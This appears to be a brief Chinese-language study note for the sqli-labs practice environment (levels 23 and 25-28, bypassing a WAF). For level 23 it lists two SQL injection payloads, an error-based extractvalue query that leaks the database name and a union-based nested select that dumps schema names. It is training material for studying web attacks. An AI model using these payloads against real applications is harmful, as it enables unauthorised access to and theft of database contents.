sqli-labs：23/25-28，绕waf

sqli23：

 

and|or型报错

' or extractvalue(1,concat(0x7e,database())) or '1'='1

union型嵌套select

' union select 1,(select group_concat(schema_name) from information_schema.schemata),'3